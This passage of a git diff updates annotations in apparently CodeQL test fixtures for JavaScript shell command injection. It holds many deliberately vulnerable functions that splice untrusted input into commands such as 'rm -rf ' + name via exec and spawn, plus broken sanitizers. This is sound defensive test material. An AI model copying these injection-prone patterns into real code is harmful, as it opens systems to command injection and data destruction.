-module.exports.mz = function (name) { - require("mz/child_process").exec("rm -rf " + name); // NOT OK. +module.exports.mz = function (name) { // $ Source + require("mz/child_process").exec("rm -rf " + name); // $ Alert Sink } -module.exports.flow = function (name) { - var cmd1 = "rm -rf " + name; // NOT OK. +module.exports.flow = function (name) { // $ Source + var cmd1 = "rm -rf " + name; // $ Alert Sink cp.exec(cmd1); - var cmd2 = "rm -rf " + name; // NOT OK. + var cmd2 = "rm -rf " + name; // $ Alert Sink function myExec(cmd) { cp.exec(cmd); } myExec(cmd2); } -module.exports.stringConcat = function (name) { - cp.exec("rm -rf " + name); // NOT OK. +module.exports.stringConcat = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.exec(name); // OK. + cp.exec(name); - cp.exec("for foo in (" + name + ") do bla end"); // NOT OK. + cp.exec("for foo in (" + name + ") do bla end"); // $ Alert Sink - cp.exec("cat /foO/BAR/" + name) // NOT OK. + cp.exec("cat /foO/BAR/" + name) // $ Alert Sink - cp.exec("cat \"" + name + "\"") // NOT OK. + cp.exec("cat \"" + name + "\"") // $ Alert Sink - cp.exec("cat '" + name + "'") // NOT OK. + cp.exec("cat '" + name + "'") // $ Alert Sink - cp.exec("cat '/foo/bar" + name + "'") // NOT OK. + cp.exec("cat '/foo/bar" + name + "'") // $ Alert Sink - cp.exec(name + " some file") // OK. + cp.exec(name + " some file") } -module.exports.arrays = function (name) { - cp.exec("rm -rf " + name); // NOT OK. +module.exports.arrays = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var args1 = ["node"]; - args1.push(name); // NOT OK. + args1.push(name); // $ Alert cp.exec(args1.join(" ")); - cp.exec(["rm -rf", name].join(" ")); // NOT OK. + cp.exec(["rm -rf", name].join(" ")); // $ Alert - cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // NOT OK. + cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // $ Alert - cp.execFile("rm", ["-rf", name]); // OK + cp.execFile("rm", ["-rf", name]); } var util = require("util"); -module.exports.format = function (name) { - cp.exec(util.format("rm -rf %s", name)); // NOT OK +module.exports.format = function (name) { // $ Source + cp.exec(util.format("rm -rf %s", name)); // $ Alert - cp.exec(util.format("rm -rf '%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '%s'", name)); // $ Alert - cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // $ Alert - cp.exec(util.format("%s foo/bar", name)); // OK + cp.exec(util.format("%s foo/bar", name)); - cp.exec(util.format("for foo in (%s) do bar end", name)); // OK + cp.exec(util.format("for foo in (%s) do bar end", name)); - cp.exec(require("printf")('rm -rf %s', name)); // NOT OK + cp.exec(require("printf")('rm -rf %s', name)); // $ Alert } -module.exports.valid = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.valid = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isValidName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } -module.exports.safe = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.safe = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isSafeName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } class Cla4 { - wha(name) { - cp.exec("rm -rf " + name); // NOT OK + wha(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } static bla(name) { @@ -145,20 +145,20 @@ function Cla5(name) { } module.exports.cla5 = new Cla5(); -module.exports.indirect = function (name) { - let cmd = "rm -rf " + name; // NOT OK +module.exports.indirect = function (name) { // $ Source + let cmd = "rm -rf " + name; // $ Alert Sink let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); } -module.exports.indirect2 = function (name) { +module.exports.indirect2 = function (name) { // $ Source let cmd = name; let sh = "sh"; let args = ["-c", cmd]; - cp.spawn(sh, args, cb); // OK + cp.spawn(sh, args, cb); - let cmd2 = "rm -rf " + name; + let cmd2 = "rm -rf " + name; // $ Alert Sink var args2 = [cmd2]; cp.spawn( 'cmd.exe', @@ -167,65 +167,65 @@ module.exports.indirect2 = function (name) { ); } -module.exports.cmd = function (command, name) { - cp.exec("fo | " + command); // OK +module.exports.cmd = function (command, name) { // $ Source + cp.exec("fo | " + command); - cp.exec("fo | " + name); // NOT OK + cp.exec("fo | " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { +module.exports.sanitizer = function (name) { // $ Source var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); - var broken = "'" + name.replace(/'/g, "'\''") + "'" - cp.exec("rm -rf " + broken); // NOT OK + var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + broken); // $ Alert Sink } var path = require("path"); -module.exports.guard = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.guard = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!path.exist(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } -module.exports.blacklistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.blacklistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/[^A-Za-z0-9_\/:=-]/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } } -module.exports.whitelistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.whitelistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.blackList2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.blackList2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!/^([a-zA-Z0-9]+))?$/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink process.exit(-1); } - cp.exec("rm -rf " + name); // OK - but FP due to tracking flow through `process.exit()`. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. } -module.exports.accessSync = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.accessSync = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink try { path.accessSync(name); @@ -233,7 +233,7 @@ module.exports.accessSync = function (name) { return; } - cp.exec("rm -rf " + name); // OK - but FP due to `path.accessSync` not being recognized as a sanitizer. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. } var cleanInput = function (s) { @@ -245,40 +245,40 @@ var cleanInput = function (s) { return s; } -module.exports.goodSanitizer = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.goodSanitizer = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var cleaned = cleanInput(name); - cp.exec("rm -rf " + cleaned); // OK - But FP due to SanitizingRegExpTest not being able to generate a barrier edge for an edge into a phi node. + cp.exec("rm -rf " + cleaned); // $ Sink SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. } var fs = require("fs"); -module.exports.guard2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.guard2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!fs.existsSync("prefix/" + name)) { - cp.exec("rm -rf prefix/" + name); // NOT OK + cp.exec("rm -rf prefix/" + name); // $ Alert Sink return; } - cp.exec("rm -rf prefix/" + name); // OK + cp.exec("rm -rf prefix/" + name); } -module.exports.sanitizerProperty = function (obj) { - cp.exec("rm -rf " + obj.version); // NOT OK +module.exports.sanitizerProperty = function (obj) { // $ Source + cp.exec("rm -rf " + obj.version); // $ Alert Sink obj.version = ""; - cp.exec("rm -rf " + obj.version); // OK + cp.exec("rm -rf " + obj.version); } module.exports.Foo = class Foo { - start(opts) { - cp.exec("rm -rf " + opts.bla); // NOT OK + start(opts) { // $ Source + cp.exec("rm -rf " + opts.bla); // $ Alert Sink this.opts = {}; this.opts.bla = opts.bla - cp.exec("rm -rf " + this.opts.bla); // NOT OK + cp.exec("rm -rf " + this.opts.bla); // $ Alert Sink } } @@ -304,25 +304,25 @@ function sanitizeShellString(str) { return result } -module.exports.sanitizer2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.sanitizer2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = sanitizeShellString(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } -module.exports.typeofcheck = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.typeofcheck = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (typeof name === "undefined") { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.typeofcheck = function (arg) { - var cmd = "MyWindowCommand | findstr /i /c:" + arg; // NOT OK +module.exports.typeofcheck = function (arg) { // $ Source + var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert Sink cp.exec(cmd); } @@ -333,22 +333,22 @@ function id(x) { module.exports.id = id; module.exports.unproblematic = function() { - cp.exec("rm -rf " + id("test")); // OK + cp.exec("rm -rf " + id("test")); }; -module.exports.problematic = function(n) { - cp.exec("rm -rf " + id(n)); // NOT OK +module.exports.problematic = function(n) { // $ Source + cp.exec("rm -rf " + id(n)); // $ Alert Sink }; module.exports.typeofNumber = function(n) { if (typeof n === "number") { - cp.exec("rm -rf " + n); // OK + cp.exec("rm -rf " + n); } }; -function boundProblem(safe, unsafe) { - cp.exec("rm -rf " + safe); // OK - cp.exec("rm -rf " + unsafe); // NOT OK +function boundProblem(safe, unsafe) { // $ Source + cp.exec("rm -rf " + safe); + cp.exec("rm -rf " + unsafe); // $ Alert Sink } Object.defineProperty(module.exports, "boundProblem", { @@ -363,8 +363,8 @@ function MyTrainer(opts) { MyTrainer.prototype = { train: function() { - var command = "learn " + this.learn_args + " " + model; // NOT OK - cp.exec(command); + var command = "learn " + this.learn_args + " " + model; // $ MISSING: Alert - lack of local field step + cp.exec(command); } }; module.exports.MyTrainer = MyTrainer; @@ -402,30 +402,30 @@ function yetAnohterSanitizer(str) { return result; } -module.exports.sanitizer3 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.sanitizer3 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = yetAnohterSanitizer(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } const cp = require("child_process"); const spawn = cp.spawn; -module.exports.shellOption = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.shellOption = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // NOT OK - cp.spawn("rm", ["-rf", name], {shell: true}); // NOT OK - cp.execFileSync("rm", ["-rf", name], {shell: true}); // NOT OK - cp.spawnSync("rm", ["-rf", name], {shell: true}); // NOT OK + cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert + cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert + cp.execFileSync("rm", ["-rf", name], {shell: true}); // $ Alert + cp.spawnSync("rm", ["-rf", name], {shell: true}); // $ Alert const SPAWN_OPT = {shell: true}; - spawn("rm", ["first", name], SPAWN_OPT); // NOT OK + spawn("rm", ["first", name], SPAWN_OPT); // $ Alert var arr = []; - arr.push(name); // NOT OK - spawn("rm", arr, SPAWN_OPT); - spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. + arr.push(name); // $ Alert + spawn("rm", arr, SPAWN_OPT); // $ Alert + spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // $ Alert } function build(first, last) { @@ -433,18 +433,18 @@ function build(first, last) { if (something() === 'gm') arr.push('convert'); first && arr.push(first); - last && arr.push(last); // NOT OK + last && arr.push(last); // $ Alert return arr; }; var asyncExec = require("async-execute"); -module.exports.asyncStuff = function (name) { - asyncExec("rm -rf " + name); // NOT OK +module.exports.asyncStuff = function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } const myFuncs = { - myFunc: function (name) { - asyncExec("rm -rf " + name); // NOT OK + myFunc: function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } }; @@ -474,13 +474,13 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); -module.exports = function check(config) { - const cmd = path.join(config.installedPath, 'myBinary -v'); // NOT OK +module.exports.check = function check(config) { // $ Source + const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } -module.exports.splitConcat = function (name) { - let args = ' my name is ' + name; // NOT OK +module.exports.splitConcat = function (name) { // $ Source + let args = ' my name is ' + name; // $ Alert Sink let cmd = 'echo'; cp.exec(cmd + args); } @@ -495,8 +495,8 @@ module.exports.myCommand = function (myCommand) { cp: require('child_process') }; - module.exports.myIndirectThing = function (name) { - MyThing.cp.exec("rm -rf " + name); // NOT OK + module.exports.myIndirectThing = function (name) { // $ Source + MyThing.cp.exec("rm -rf " + name); // $ Alert Sink } }); @@ -506,91 +506,91 @@ for (var name in imp){ module.exports[name] = imp[name]; } -module.exports.sanitizer4 = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.sanitizer4 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isNaN(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(+name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name, 10))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name - 0)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name | 0)) { // <- not a sanitizer - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.shellThing = function (name) { +module.exports.shellThing = function (name) { // $ Source function indirectShell(cmd, args, spawnOpts) { - cp.spawn(cmd, args, spawnOpts); // NOT OK + cp.spawn(cmd, args, spawnOpts); // $ Alert } - - indirectShell("rm", ["-rf", name], {shell: true}); + + indirectShell("rm", ["-rf", name], {shell: true}); // $ Alert } -module.exports.badSanitizer = function (name) { +module.exports.badSanitizer = function (name) { // $ Source if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert Sink } else { - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert Sink } if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert Sink } else { - exec("rm -rf " + name); // OK + exec("rm -rf " + name); } } -module.exports.safeWithBool = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.safeWithBool = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name) === true) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) == false) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } function indirectThing(name) { @@ -605,37 +605,37 @@ function moreIndirect(name) { return indirectThing2(name) !== false; } -module.exports.veryIndeirect = function (name) { - cp.exec("rm -rf " + name); // NOT OK +module.exports.veryIndeirect = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (indirectThing(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (indirectThing2(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { - var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // NOT OK +module.exports.sanitizer = function (name) { // $ Source + var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + sanitized); // $ Alert Sink var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); var sanitized = "'" + name.replace(new RegExp("\'", unknownFlags()), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK -- Most likely should be okay and not flagged to reduce false positives. + cp.exec("rm -rf " + sanitized); // OK - Most likely should be okay and not flagged to reduce false positives. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js index db1ecd02413f..9c427622c770 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js @@ -1,9 +1,9 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - is imported from main module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js index b107ac03d7ae..1f512e8c3817 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // OK, is not exported to a main-module. + cp.exec("rm -rf " + name); // OK - is not exported to a main-module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js index a594c2182392..e268f47c4e20 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js @@ -1,5 +1,5 @@ const cp = require("child_process"); -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this function is exported from `amd.js` +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this function is exported from `amd.js` }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js index 6e7d3498723d..0b1abc951286 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js @@ -1,15 +1,15 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this is being called explicitly from child_process-test.js +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - this is being called explicitly from child_process-test.js }; module.exports.amd = require("./amd.js"); -module.exports.arrToShell = function (cmd, arr) { - cp.spawn("echo", arr, {shell: true}); // NOT OK +module.exports.arrToShell = function (cmd, arr) { // $ Source + cp.spawn("echo", arr, {shell: true}); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts index 1e945f15e724..e6b7a10bacf6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -export default function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. +export default function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js index c46fed331815..853e144a0d62 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - the "files" directory points to this file. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts index 9fa88413cc88..f28c157a5ead 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") -module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. +module.exports = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js index 820349c5c62f..505f4e7af78a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/index.js @@ -3,6 +3,6 @@ const dispatch = { POST: require("./subsub"), }; -module.exports.foo = function (name, type) { +module.exports.foo = function (name, type) { // $ Source dispatch[type](name); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js index 952288a82cef..b8da58006c7c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -1,5 +1,5 @@ const cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert Sink - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected index 1a561b8fc416..820d8af4767d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected @@ -78,7 +78,7 @@ options | uselesscat.js:86:1:86:75 | execFil ... utf8'}) | uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | | uselesscat.js:100:1:100:56 | execFil ... ptions) | uselesscat.js:100:42:100:55 | unknownOptions | | uselesscat.js:111:1:111:51 | spawn(' ... it'] }) | uselesscat.js:111:14:111:50 | { stdio ... rit'] } | -| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | +| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // $ ... utf8'\\n} | | uselesscat.js:147:1:147:47 | shelljs ... utf8'}) | uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | | uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) | uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | | uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) | uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js index 9654b26dec03..6e62a1655420 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js @@ -7,21 +7,21 @@ var spawnSync = child_process.spawnSync; var fs = require('fs'); var app = express(); -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat /proc/" + id + "/status", function (err, out) { // NOT OK +exec("cat /proc/" + id + "/status", function (err, out) { // $ Alert console.log(out); }); -execSync('cat /proc/cpuinfo').toString(); // NOT OK. +execSync('cat /proc/cpuinfo').toString(); // $ Alert -execSync(`cat ${newpath}`) // NOT OK +execSync(`cat ${newpath}`) // $ Alert execSync('cat package.json | wc -l'); // OK - pipes! -execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK multiple files. +execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK - multiple files. -execSync(`cat ${newpath} /foo/bar`).toString(); // OK multiple files. +execSync(`cat ${newpath} /foo/bar`).toString(); // OK - multiple files. exec(`cat ${newpath} | grep foo`, function (err, out) { }) // OK - pipes @@ -29,73 +29,73 @@ execSync(`cat ${newpath}`, {uid: 1000}) // OK - non trivial options exec('cat *.js | wc -l', { cwd: './' }, function (err, out) { }); // OK - wildcard and pipes -execSync(`cat foo/bar/${newpath}`); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK (fs.readFileSync cannot emulate uid / gid)) +execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK - (fs.readFileSync cannot emulate uid / gid)) -execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); // OK. +execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); -execSync(`cat ${newpath} > ${destpath}`).toString(); // OK. +execSync(`cat ${newpath} > ${destpath}`).toString(); -execSync(`cat ${files.join(' ')} > 